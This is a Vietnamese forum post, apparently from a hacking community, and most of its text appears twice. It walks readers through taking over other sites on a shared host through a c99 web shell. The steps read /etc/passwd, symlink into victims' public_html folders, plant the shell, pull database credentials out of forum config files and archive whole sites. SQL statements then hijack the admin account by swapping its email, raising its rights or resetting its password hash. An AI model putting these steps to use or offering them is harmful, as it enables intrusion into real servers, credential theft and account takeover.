1 cài câu lệnh phổ biến cho ae NB, và dể hiễu
cat / etc / passwd : liệt kê các user có trên server
dir / home / user / public_html / : đi đến public_html của user(tuy sv)
ln - s / home / user / public_html / index . php xx. txt : ghi file index . php vào file xx.txt trên thư mục mình đang dùng : ví dụ đang dùng http://abc.com/c99.php thì vào http://abc.com/xx.txt Vậy muốn ghi con shell của mình vào host người khác thìlàm sao ??
ln - s / home / user_của_mình / public_html / c99 . php / home / user_của_victim / public_html / c99 . php lựa chọn thư mục chmod 777 hay 755 mà có quyền ghi nhé _Nếu bị chmod ko cho ghi thìsao ??
=>Thì dir qua web nó rồi runcommand típ
_Nếu wa web nó ko run đc thì sao ?
=>thì xem web nó có forum hay cái gì đó ko mình úp shell thông qua lỗi ảnh hoặc úp wa forum
-vậy phải làm sao để xem đc file config để vào được database ?
cat / home / user / public_html / forum / includes / config . php >> xem file config . php _Nếu ko xem được thì sao??,diss các hàm và éo có symljnk ??
=> thì download website nó về mà ngâm cứu config
tar - czf hehehe . tar . gz / home / user / public_html / forum / >> download nguyên cái forum
ko thì download cái config nóthôi.
tar - czf config . tar . gz / home / user / public_html / forum / includes / config . php _Nếu lệnh zip ko được nữa thì sao ,config mã hóa thì sao
thì xem cách mã hóa
hiện tại có 2 cái dezend và base64_decode ,xem google thì bít
nếu zip ko đc chắc bó tay quá >> đỗi cách khác (nói lăng nhăng quá mình bỏ wa bước này )
Vậy nếu có user pass datamà đăng nhập ko được ,đăngnhập đc mà ko zip đc thì làm sào sữa đc mà vào admin úpshell trên forum ??
=>Con shell mình đang dùng ko phải là root nên rất hạn chế
1 vài lệnh cải thiện :
chmod a wxr file . php - rwxrwxrwx chmod a drw file . php - rwxrwxrwx chmod - R a rx thumuc >> giao quyen doc va vao ben trongthu muc , ke ca thu muc con chmod -R a rw thumuc >> giao quyen doc va ghi...
chmod -R a rwx thumuc >> quyen root
mkdir backup >> tạo thư mục backup
chmod 777 backup >> chmod nó thành 777 để mình zip data.zip lên
_Nếu ko chmod 777 được thì làm sao ?
=> tạo con chmod.php nội dung như sau:
up lên rồi run
http://abc.com/chmod.php
sau đó úp con dumper.php lên rồi điền info vào zip ,zip xong có thể về localhost chỉnh sữa rồi up lên => backup thế là mình đã quản lí
-Cách này lằng nhằng quá,data nó cả trăm M thì phiền?
vậy thì dùng con c99.php,vào chổ nào có user mà chỉnh sữa
ví dụ nó có bảng user bao gồm id và email ,....thì run command trên SQL của data là
update user set email = "mail của bạn" whereid = 1 nếu user admin nó có id là 1,đã thay thế = mail của bạn
>> sau đó chơi quên mật khẩu gửi user pass về email mail của bạn
hoặc
>> set user xxxx lên thẳng admin (vào reg nick xxxx trước nhá)
hoặc
>> [text]e10adc3949ba59abbe56e057f20f883e = 123456[/text] >> vào mà đăng nhập user=admin_của_nó ;pass=123456
mấy bước làm sao thì ae kiếm clip xem sẽ hiễu
>> up qua style hoặc plugin gì gì đó là đc thôi
Chơi thôi đừng quá hoại gì!
cat / etc / passwd : liệt kê các user có trên server
dir / home / user / public_html / : đi đến public_html của user(tuy sv)
ln - s / home / user / public_html / index . php xx. txt : ghi file index . php vào file xx.txt trên thư mục mình đang dùng : ví dụ đang dùng http://abc.com/c99.php thì vào http://abc.com/xx.txt Vậy muốn ghi con shell của mình vào host người khác thìlàm sao ??
ln - s / home / user_của_mình / public_html / c99 . php / home / user_của_victim / public_html / c99 . php lựa chọn thư mục chmod 777 hay 755 mà có quyền ghi nhé _Nếu bị chmod ko cho ghi thìsao ??
=>Thì dir qua web nó rồi runcommand típ
_Nếu wa web nó ko run đc thì sao ?
=>thì xem web nó có forum hay cái gì đó ko mình úp shell thông qua lỗi ảnh hoặc úp wa forum
-vậy phải làm sao để xem đc file config để vào được database ?
cat / home / user / public_html / forum / includes / config . php >> xem file config . php _Nếu ko xem được thì sao??,diss các hàm và éo có symljnk ??
=> thì download website nó về mà ngâm cứu config
tar - czf hehehe . tar . gz / home / user / public_html / forum / >> download nguyên cái forum
ko thì download cái config nóthôi.
tar - czf config . tar . gz / home / user / public_html / forum / includes / config . php _Nếu lệnh zip ko được nữa thì sao ,config mã hóa thì sao
thì xem cách mã hóa
hiện tại có 2 cái dezend và base64_decode ,xem google thì bít
nếu zip ko đc chắc bó tay quá >> đỗi cách khác (nói lăng nhăng quá mình bỏ wa bước này )
Vậy nếu có user pass datamà đăng nhập ko được ,đăngnhập đc mà ko zip đc thì làm sào sữa đc mà vào admin úpshell trên forum ??
=>Con shell mình đang dùng ko phải là root nên rất hạn chế
1 vài lệnh cải thiện :
chmod a wxr file . php - rwxrwxrwx chmod a drw file . php - rwxrwxrwx chmod - R a rx thumuc >> giao quyen doc va vao ben trongthu muc , ke ca thu muc con chmod -R a rw thumuc >> giao quyen doc va ghi...
chmod -R a rwx thumuc >> quyen root
mkdir backup >> tạo thư mục backup
chmod 777 backup >> chmod nó thành 777 để mình zip data.zip lên
_Nếu ko chmod 777 được thì làm sao ?
=> tạo con chmod.php nội dung như sau:
PHP:
<?php chmod ( "backup" , 0777 ); ?>http://abc.com/chmod.php
sau đó úp con dumper.php lên rồi điền info vào zip ,zip xong có thể về localhost chỉnh sữa rồi up lên => backup thế là mình đã quản lí
-Cách này lằng nhằng quá,data nó cả trăm M thì phiền?
vậy thì dùng con c99.php,vào chổ nào có user mà chỉnh sữa
ví dụ nó có bảng user bao gồm id và email ,....thì run command trên SQL của data là
update user set email = "mail của bạn" whereid = 1 nếu user admin nó có id là 1,đã thay thế = mail của bạn
>> sau đó chơi quên mật khẩu gửi user pass về email mail của bạn
hoặc
PHP:
update user set id = '6' where user = 'xxxx'hoặc
PHP:
update user set passwd = "e10adc3949ba59abbe56e057f20f883e" where id = 1mấy bước làm sao thì ae kiếm clip xem sẽ hiễu
>> up qua style hoặc plugin gì gì đó là đc thôi
Chơi thôi đừng quá hoại gì!
![[cXF] Icons in More options menu](/data/resource_icons/0/432.jpg?1730710877){kind=icon}
![Arabic Language Pack [vBulletin 6.0.0]](/data/resource_icons/0/431.jpg?1728563962){kind=icon}
![[cXF] Sticky Postbit](/data/resource_icons/0/429.jpg?1728039111){kind=icon}
